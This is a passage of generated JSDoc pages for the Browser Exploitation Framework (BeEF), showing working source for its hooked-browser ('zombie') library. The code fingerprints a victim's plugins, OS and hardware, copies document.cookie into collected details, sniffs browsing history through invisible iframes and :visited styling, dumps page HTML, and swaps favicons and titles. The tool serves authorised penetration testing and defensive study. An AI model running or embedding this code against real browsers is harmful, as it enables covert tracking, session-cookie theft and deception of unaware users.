} catch (e) {
beef.debug("Creating Flash ActiveX object failed: " + e.message);
}
}
}
return false;
},
/**
* Checks if the zombie has the QuickTime plugin installed.
* @return: {Boolean} true or false.
*
* @example: if ( beef.browser.hasQuickTime() ) { ... }
*/
hasQuickTime: function () {
if (!!navigator.plugins) {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("QuickTime") >= 0) {
return true;
}
}
}
// IE
try {
var qt_test = new ActiveXObject('QuickTime.QuickTime');
if (qt_test) {
return true;
}
} catch (e) {
beef.debug("Creating QuickTime ActiveX object failed: " + e.message);
}
return false;
},
/**
* Checks if the zombie has the RealPlayer plugin installed.
* @return: {Boolean} true or false.
*
* @example: if ( beef.browser.hasRealPlayer() ) { ... }
*/
hasRealPlayer: function () {
if (!!navigator.plugins) {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("RealPlayer") >= 0) {
return true;
}
}
}
// IE
var definedControls = [
'RealPlayer',
'rmocx.RealPlayer G2 Control',
'rmocx.RealPlayer G2 Control.1',
'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
];
for (var i = 0; i < definedControls.length; i++) {
try {
var rp_test = new ActiveXObject(definedControls[i]);
if (rp_test) {
return true;
}
} catch (e) {
beef.debug("Creating RealPlayer ActiveX object failed: " + e.message);
}
}
return false;
},
/**
* Checks if the zombie has the Windows Media Player plugin installed.
* @return: {Boolean} true or false.
*
* @example: if ( beef.browser.hasWMP() ) { ... }
*/
hasWMP: function () {
if (!!navigator.plugins) {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("Windows Media Player") >= 0) {
return true;
}
}
}
// IE
try {
var wmp_test = new ActiveXObject('WMPlayer.OCX');
if (wmp_test) {
return true;
}
} catch (e) {
beef.debug("Creating WMP ActiveX object failed: " + e.message);
}
return false;
},
/**
* Checks if VLC is installed
* @return: {Boolean} true or false
**/
hasVLC: function () {
if (beef.browser.isIE() || beef.browser.isEdge()) {
try {
control = new ActiveXObject("VideoLAN.VLCPlugin.2");
return true;
} catch (e) {
beef.debug("Creating VLC ActiveX object failed: " + e.message);
}
} else {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("VLC") >= 0) {
return true;
}
}
}
return false;
},
/**
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled: function () {
return navigator.javaEnabled();
},
/**
* Checks if the Phonegap API is available from the hooked origin.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasPhonegap()) { ... }
*/
hasPhonegap: function () {
var result = false;
try {
if (!!device.phonegap || !!device.cordova) result = true; else result = false;
}
catch (e) {
result = false;
}
return result;
},
/**
* Checks if the browser supports CORS
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasCors()) { ... }
*/
hasCors: function () {
if ('withCredentials' in new XMLHttpRequest())
return true;
else if (typeof XDomainRequest !== "undefined")
return true;
else
return false;
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasJava()) { ... }
*/
hasJava: function () {
if (beef.browser.getPlugins().match(/java/i) && beef.browser.javaEnabled()) {
return true;
} else {
return false;
}
},
/**
* Checks if the zombie has VBScript enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasVBScript()) { ... }
*/
hasVBScript: function () {
if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) {
return true;
} else {
return false;
}
},
/**
* Returns the list of plugins installed in the browser.
*/
getPlugins: function () {
var results;
function unique(array) {
return $.grep(array, function(el, index) {
return index === $.inArray(el, array);
});
}
// Things lacking navigator.plugins
if (!navigator.plugins)
return this.getPluginsIE();
// All other browsers that support navigator.plugins
if (navigator.plugins && navigator.plugins.length > 0) {
results = new Array();
for (var i = 0; i < navigator.plugins.length; i++) {
// Firefox returns exact plugin versions
if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
// Webkit and Presto (Opera)
// Don't support the version attribute
// Sometimes store the version in description (Real, Adobe)
else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
}
results = unique(results).toString();
// All browsers that don't support navigator.plugins
} else {
results = new Array();
//firefox https://bugzilla.mozilla.org/show_bug.cgi?id=757726
// On linux sistem the "version" slot is empty so I'll attach "description" after version
var plugins = {
'AdobeAcrobat': {
'control': 'Adobe Acrobat',
'return': function (control) {
try {
version = navigator.plugins["Adobe Acrobat"]["description"];
return 'Adobe Acrobat Version ' + version; //+ " description "+ filename;
}
catch (e) {
}
}},
'Flash': {
'control': 'Shockwave Flash',
'return': function (control) {
try {
version = navigator.plugins["Shockwave Flash"]["description"];
return 'Flash Player Version ' + version; //+ " description "+ filename;
}
catch (e) {
}
}},
'Google_Talk_Plugin_Accelerator': {
'control': 'Google Talk Plugin Video Accelerator',
'return': function (control) {
try {
version = navigator.plugins['Google Talk Plugin Video Accelerator']["description"];
return 'Google Talk Plugin Video Accelerator Version ' + version; //+ " description "+ filename;
}
catch (e) {
}
}},
'Google_Talk_Plugin': {
'control': 'Google Talk Plugin',
'return': function (control) {
try {
version = navigator.plugins['Google Talk Plugin']["description"];
return 'Google Talk Plugin Version ' + version;// " description "+ filename;
}
catch (e) {
}
}},
'Facebook_Video_Calling_Plugin': {
'control': 'Facebook Video Calling Plugin',
'return': function (control) {
try {
version = navigator.plugins["Facebook Video Calling Plugin"]["description"];
return 'Facebook Video Calling Plugin Version ' + version;//+ " description "+ filename;
}
catch (e) {
}
}},
'Google_Update': {
'control': 'Google Update',
'return': function (control) {
try {
version = navigator.plugins["Google Update"]["description"];
return 'Google Update Version ' + version//+ " description "+ filename;
}
catch (e) {
}
}},
'Windows_Activation_Technologies': {
'control': 'Windows Activation Technologies',
'return': function (control) {
try {
version = navigator.plugins["Windows Activation Technologies"]["description"];
return 'Windows Activation Technologies Version ' + version;//+ " description "+ filename;
}
catch (e) {
}
}},
'VLC_Web_Plugin': {
'control': 'VLC Web Plugin',
'return': function (control) {
try {
version = navigator.plugins["VLC Web Plugin"]["description"];
return 'VLC Web Plugin Version ' + version;//+ " description "+ filename;
}
catch (e) {
}
}},
'Google_Earth_Plugin': {
'control': 'Google Earth Plugin',
'return': function (control) {
try {
version = navigator.plugins['Google Earth Plugin']["description"];
return 'Google Earth Plugin Version ' + version;//+ " description "+ filename;
}
catch (e) {
}
}},
'FoxitReader_Plugin': {
'control': 'FoxitReader Plugin',
'return': function (control) {
try {
version = navigator.plugins['Foxit Reader Plugin for Mozilla']['version'];
return 'FoxitReader Plugin Version ' + version;
} catch (e) {
}
}}
};
var c = 0;
for (var i in plugins) {
//each element od plugins
var control = plugins[i]['control'];
try {
var version = plugins[i]['return'](control);
if (version) {
results[c] = version;
c = c + 1;
}
}
catch (e) {
}
}
}
// Return results
return results;
},
/**
* Returns a list of plugins detected by IE. This is a hack because IE doesn't
* support navigator.plugins
*/
getPluginsIE: function () {
var results = '';
var plugins = {
'AdobePDF6': {
'control': 'PDF.PdfCtrl',
'return': function (control) {
version = control.getVersions().split(',');
version = version[0].split('=');
return 'Acrobat Reader v' + parseFloat(version[1]);
}},
'AdobePDF7': {
'control': 'AcroPDF.PDF',
'return': function (control) {
version = control.getVersions().split(',');
version = version[0].split('=');
return 'Acrobat Reader v' + parseFloat(version[1]);
}},
'Flash': {
'control': 'ShockwaveFlash.ShockwaveFlash',
'return': function (control) {
version = control.getVariable('$version').substring(4);
return 'Flash Player v' + version.replace(/,/g, ".");
}},
'Quicktime': {
'control': 'QuickTime.QuickTime',
'return': function (control) {
return 'QuickTime Player';
}},
'RealPlayer': {
'control': 'RealPlayer',
'return': function (control) {
version = control.getVersionInfo();
return 'RealPlayer v' + parseFloat(version);
}},
'Shockwave': {
'control': 'SWCtl.SWCtl',
'return': function (control) {
version = control.ShockwaveVersion('').split('r');
return 'Shockwave v' + parseFloat(version[0]);
}},
'WindowsMediaPlayer': {
'control': 'WMPlayer.OCX',
'return': function (control) {
return 'Windows Media Player v' + parseFloat(control.versionInfo);
}},
'FoxitReaderPlugin': {
'control': 'FoxitReader.FoxitReaderCtl.1',
'return': function (control) {
return 'Foxit Reader Plugin v' + parseFloat(control.versionInfo);
}}
};
if (window.ActiveXObject) {
var j = 0;
for (var i in plugins) {
var control = null;
var version = null;
try {
control = new ActiveXObject(plugins[i]['control']);
} catch (e) {
}
if (control) {
if (j != 0)
results += ', ';
results += plugins[i]['return'](control);
j++;
}
}
}
return results;
},
/**
* Returns zombie browser window size.
* @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow
*/
getWindowSize: function () {
var myWidth = 0, myHeight = 0;
if (typeof( window.innerWidth ) == 'number') {
// Non-IE
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if (document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )) {
// IE 6+ in 'standards compliant mode'
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if (document.body && ( document.body.clientWidth || document.body.clientHeight )) {
// IE 4 compatible
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}
return {
width: myWidth,
height: myHeight
}
},
/**
* Construct hash from browser details. This function is used to grab the browser details during the hooking process
*/
getDetails: function () {
var details = new Array();
var browser_name = beef.browser.getBrowserName();
var browser_version = beef.browser.getBrowserVersion();
var browser_engine = beef.browser.getBrowserEngine();
var browser_reported_name = beef.browser.getBrowserReportedName();
var browser_language = beef.browser.getBrowserLanguage();
var page_title = (document.title) ? document.title : "Unknown";
var origin = (window.origin) ? window.origin : "Unknown";
var page_uri = (document.location.href) ? document.location.href : "Unknown";
var page_referrer = (document.referrer) ? document.referrer : "Unknown";
var page_hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
var default_port = "";
switch (document.location.protocol) {
case "http:":
var default_port = "80";
break;
case "https:":
var default_port = "443";
break;
}
var page_hostport = (document.location.port) ? document.location.port : default_port;
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var os_family = beef.os.getFamily();
var os_version = beef.os.getVersion();
var os_arch = beef.os.getArch();
var default_browser = beef.os.getDefaultBrowser();
var hw_type = beef.hardware.getName();
var battery_details = beef.hardware.getBatteryDetails();
try {
var battery_charging_status = battery_details.chargingStatus;
var battery_level = battery_details.batteryLevel;
var battery_charging_time = battery_details.chargingTime;
var battery_discharging_time = battery_details.dischargingTime;
} catch(e) {}
var memory = beef.hardware.getMemory();
var cpu_arch = beef.hardware.getCpuArch();
var cpu_cores = beef.hardware.getCpuCores();
var gpu_details = beef.hardware.getGpuDetails();
try {
var gpu = gpu_details.gpu;
var gpu_vendor = gpu_details.vendor;
} catch(e) {}
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : 'Unknown';
var screen_size = beef.hardware.getScreenSize();
try {
var screen_width = screen_size.width;
var screen_height = screen_size.height;
var screen_colordepth = screen_size.colordepth;
} catch(e) {}
var window_size = beef.browser.getWindowSize();
try {
window_width = window_size.width;
window_height = window_size.height;
} catch(e) {}
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_web_worker = (beef.browser.hasWebWorker()) ? "Yes" : "No";
var has_web_gl = (beef.browser.hasWebGL()) ? "Yes" : "No";
var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
try {
var cookies = document.cookie;
/* Never stop the madness dear C.
* var veglol = beef.browser.cookie.veganLol();
*/
if (cookies) details['browser.window.cookies'] = cookies;
} catch (e) {
beef.debug("Cookies can't be read. The hooked origin is most probably using HttpOnly.");
details['browser.window.cookies'] = '';
}
if (browser_name) details['browser.name'] = browser_name;
if (browser_version) details['browser.version'] = browser_version;
if (browser_engine) details['browser.engine'] = browser_engine;
if (browser_reported_name) details['browser.name.reported'] = browser_reported_name;
if (browser_platform) details['browser.platform'] = browser_platform;
if (browser_language) details['browser.language'] = browser_language;
if (browser_plugins) details['browser.plugins'] = browser_plugins;
if (page_title) details['browser.window.title'] = page_title;
if (origin) details['browser.window.origin'] = origin;
if (page_hostname) details['browser.window.hostname'] = page_hostname;
if (page_hostport) details['browser.window.hostport'] = page_hostport;
if (page_uri) details['browser.window.uri'] = page_uri;
if (page_referrer) details['browser.window.referrer'] = page_referrer;
if (window_width) details['browser.window.size.width'] = window_width;
if (window_height) details['browser.window.size.height'] = window_height;
if (date_stamp) details['browser.date.datestamp'] = date_stamp;
if (os_name) details['host.os.name'] = os_name;
if (os_family) details['host.os.family'] = os_family;
if (os_version) details['host.os.version'] = os_version;
if (os_arch) details['host.os.arch'] = os_arch;
if (default_browser) details['host.software.defaultbrowser'] = default_browser;
if (hw_type) details['hardware.type'] = hw_type;
if (memory) details['hardware.memory'] = memory;
if (gpu) details['hardware.gpu'] = gpu;
if (gpu_vendor) details['hardware.gpu.vendor'] = gpu_vendor;
if (cpu_arch) details['hardware.cpu.arch'] = cpu_arch;
if (cpu_cores) details['hardware.cpu.cores'] = cpu_cores;
if (battery_charging_status) details['hardware.battery.chargingstatus'] = battery_charging_status;
if (battery_level) details['hardware.battery.level'] = battery_level;
if (battery_charging_time) details['hardware.battery.chargingtime'] = battery_charging_time;
if (battery_discharging_time) details['hardware.battery.dischargingtime'] = battery_discharging_time;
if (screen_width) details['hardware.screen.size.width'] = screen_width;
if (screen_height) details['hardware.screen.size.height'] = screen_height;
if (screen_colordepth) details['hardware.screen.colordepth'] = screen_colordepth;
if (touch_enabled) details['hardware.screen.touchenabled'] = touch_enabled;
if (vbscript_enabled) details['browser.capabilities.vbscript'] = vbscript_enabled;
if (has_flash) details['browser.capabilities.flash'] = has_flash;
if (has_silverlight) details['browser.capabilities.silverlight'] = has_silverlight;
if (has_phonegap) details['browser.capabilities.phonegap'] = has_phonegap;
if (has_web_socket) details['browser.capabilities.websocket'] = has_web_socket;
if (has_webrtc) details['browser.capabilities.webrtc'] = has_webrtc;
if (has_web_worker) details['browser.capabilities.webworker'] = has_web_worker;
if (has_web_gl) details['browser.capabilities.webgl'] = has_web_gl;
if (has_googlegears) details['browser.capabilities.googlegears'] = has_googlegears;
if (has_activex) details['browser.capabilities.activex'] = has_activex;
if (has_quicktime) details['browser.capabilities.quicktime'] = has_quicktime;
if (has_realplayer) details['browser.capabilities.realplayer'] = has_realplayer;
if (has_wmp) details['browser.capabilities.wmp'] = has_wmp;
if (has_vlc) details['browser.capabilities.vlc'] = has_vlc;
return details;
},
/**
* Returns boolean value depending on whether the browser supports ActiveX
*/
hasActiveX: function () {
return !!window.ActiveXObject;
},
/**
* Returns boolean value depending on whether the browser supports WebRTC
*/
hasWebRTC: function () {
return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
},
/**
* Returns boolean value depending on whether the browser supports Silverlight
*/
hasSilverlight: function () {
var result = false;
try {
if (beef.browser.hasActiveX()) {
var slControl = new ActiveXObject('AgControl.AgControl');
result = true;
} else if (navigator.plugins["Silverlight Plug-In"]) {
result = true;
}
} catch (e) {
result = false;
}
return result;
},
/**
* Returns array of results, whether or not the target zombie has visited the specified URL
*/
hasVisited: function (urls) {
var results = new Array();
var iframe = beef.dom.createInvisibleIframe();
var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document;
ifdoc.open();
ifdoc.write('<style>a:visited{width:0px !important;}</style>');
ifdoc.close();
urls = urls.split("\n");
var count = 0;
for (var i in urls) {
var u = urls[i];
if (u != "" || u != null) {
var success = false;
var a = ifdoc.createElement('a');
a.href = u;
ifdoc.body.appendChild(a);
var width = null;
(a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width");
if (width == '0px') {
success = true;
}
results.push({'url': u, 'visited': success});
count++;
}
}
beef.dom.removeElement(iframe);
if (results.length == 0) {
return false;
}
return results;
},
/**
* Checks if the zombie has Web Sockets enabled.
* @return: {Boolean} true or false.
* In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
* */
hasWebSocket: function () {
return !!window.WebSocket || !!window.MozWebSocket;
},
/**
* Checks if the zombie has Web Workers enabled.
* @return: {Boolean} true or false.
* */
hasWebWorker: function () {
return (typeof(Worker) !== "undefined");
},
/**
* Checks if the zombie has WebGL enabled.
* @return: {Boolean} true or false.
*
* @from: https://github.com/idofilin/webgl-by-example/blob/master/detect-webgl/detect-webgl.js
* */
hasWebGL: function () {
try {
var canvas = document.createElement("canvas");
var gl = canvas.getContext("webgl") || canvas.getContext("experimental-webgl");
return !!(gl && gl instanceof WebGLRenderingContext);
} catch(e) {
return false;
}
},
/**
* Checks if the zombie has Google Gears installed.
* @return: {Boolean} true or false.
*
* @from: https://code.google.com/apis/gears/gears_init.js
* */
hasGoogleGears: function () {
var ggfactory = null;
// Chrome
if (window.google && google.gears) return true;
// Firefox
if (typeof GearsFactory != 'undefined') {
ggfactory = new GearsFactory();
} else {
// IE
try {
ggfactory = new ActiveXObject('Gears.Factory');
// IE Mobile on WinCE.
if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) {
ggfactory.privateSetGlobalObject(this);
}
} catch (e) {
// Safari
if ((typeof navigator.mimeTypes != 'undefined')
&& navigator.mimeTypes["application/x-googlegears"]) {
ggfactory = document.createElement("object");
ggfactory.style.display = "none";
ggfactory.width = 0;
ggfactory.height = 0;
ggfactory.type = "application/x-googlegears";
document.documentElement.appendChild(ggfactory);
if (ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null;
}
}
}
if (!ggfactory) return false; else return true;
},
/**
* Checks if the zombie has Foxit PDF reader plugin.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasFoxit()) { ... }
* */
hasFoxit: function () {
var foxitplugin = false;
try {
if (beef.browser.hasActiveX()) {
var foxitControl = new ActiveXObject('FoxitReader.FoxitReaderCtl.1');
foxitplugin = true;
} else if (navigator.plugins['Foxit Reader Plugin for Mozilla']) {
foxitplugin = true;
}
} catch (e) {
foxitplugin = false;
}
return foxitplugin;
},
/**
* Returns the page head HTML
**/
getPageHead: function () {
var html_head;
try {
html_head = document.head.innerHTML.toString();
} catch (e) {
}
return html_head;
},
/**
* Returns the page body HTML
**/
getPageBody: function () {
var html_body;
try {
html_body = document.body.innerHTML.toString();
} catch (e) {
}
return html_body;
},
/**
* Dynamically changes the favicon: works in Firefox, Chrome and Opera
**/
changeFavicon: function (favicon_url) {
var iframe = null;
if (this.isC()) {
iframe = document.createElement('iframe');
iframe.src = 'about:blank';
iframe.style.display = 'none';
document.body.appendChild(iframe);
}
var link = document.createElement('link'),
oldLink = document.getElementById('dynamic-favicon');
link.id = 'dynamic-favicon';
link.rel = 'shortcut icon';
link.href = favicon_url;
if (oldLink) document.head.removeChild(oldLink);
document.head.appendChild(link);
if (this.isC()) iframe.src += '';
},
/**
* Changes page title
**/
changePageTitle: function (title) {
document.title = title;
},
/**
* Get the browser language
*/
getBrowserLanguage: function () {
var l = 'Unknown';
try {
l = window.navigator.userLanguage || window.navigator.language;
} catch (e) {
}
return l;
},
/**
* A function that gets the max number of simultaneous connections the
* browser can make per origin, or globally on all origin.
*
* This code is based on research from browserspy.dk
*
* @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default}
* @return {Object} A jQuery deferred object promise, which when resolved passes
* the number of connections to the callback function as "this"
*/
getMaxConnections: function (scope) {
/*
* example usage:
* $j.when(getMaxConnections()).done(function(){
* console.debug("Max Connections: " + this);
* });
*/
var imagesCount = 30; // Max number of images to test
var secondsTimeout = 5; // Image load timeout threashold
var testUrl = ""; // The image testing service URL
// User broserspy.dk max connections service URL.
if (scope == 'PER_DOMAIN')
testUrl = "http://browserspy.dk/connections.php?img=1&amp;random=";
else
// The token will be replaced by a different number with each request (different origin).
testUrl = "http://<token>.browserspy.dk/connections.php?img=1&amp;random=";
var imagesLoaded = 0; // Number of responding images before timeout.
var imagesRequested = 0; // Number of requested images.
var testImages = new Array(); // Array of all images.
var deferredObject = $j.Deferred(); // A jquery Deferred object.
for (var i = 1; i <= imagesCount; i++) {
// Asynchronously request image.
testImages[i] =
$j.ajax({
type: "get",
dataType: true,
url: (testUrl.replace("<token>", i)) + Math.random(),
data: "",
timeout: (secondsTimeout * 1000),
// Function on completion of request.
complete: function (jqXHR, textStatus) {
imagesRequested++;
// If the image returns a 200 or a 302, the text Status is "error", else null
if (textStatus == "error") {
imagesLoaded++;
}
// If all images requested
if (imagesRequested >= imagesCount) {
// resolve the deferred object passing the number of loaded images.
deferredObject.resolveWith(imagesLoaded);
}
}
});
}
// Return a promise to resolve the deffered object when the images are loaded.
return deferredObject.promise();
}
};
beef.regCmp('beef.browser');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/browser_cookie.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: browser/cookie.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: browser/cookie.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides fuctions for working with cookies.
* Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
* Original author unknown.
* @namespace beef.browser.cookie
*/
beef.browser.cookie = {
/** @memberof beef.browser.cookie */
setCookie: function (name, value, expires, path, domain, secure)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
},
/** @memberof beef.browser.cookie */
getCookie: function(name)
{
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
},
/** @memberof beef.browser.cookie */
deleteCookie: function (name, path, domain)
{
if ( this.getCookie(name) ) document.cookie = name + "=" +
( ( path ) ? ";path=" + path : "") +
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
/** @memberof beef.browser.cookie */
veganLol: function (){
var to_hell= '';
var min = 17;
var max = 25;
var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
var grunt = function(){
var moo = Math.floor(Math.random() * 62);
var char = '';
if(moo < 36){
char = String.fromCharCode(moo + 55);
}else{
char = String.fromCharCode(moo + 61);
}
if(char != ';' && char != '='){
return char;
}else{
return 'x';
}
};
while(to_hell.length < lol_length){
to_hell += grunt();
}
return to_hell;
},
/** @memberof beef.browser.cookie */
hasSessionCookies: function (name){
this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
},
/** @memberof beef.browser.cookie */
hasPersistentCookies: function (name){
this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
}
};
beef.regCmp('beef.browser.cookie');</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/browser_jools.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: browser_jools</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: browser_jools</h1>
<section>
<header>
<h2>browser_jools</h2>
</header>
<article>
<div class="container-overview">
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line1">line 1</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Members</h3>
<h4 class="name" id=".exports.version"><span class="type-signature">(static) </span>exports.version<span class="type-signature"></span></h4>
<div class="description">
<p>version</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line382">line 382</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".require.resolve"><span class="type-signature">(static) </span>require.resolve<span class="type-signature"></span></h4>
<dl class="details">
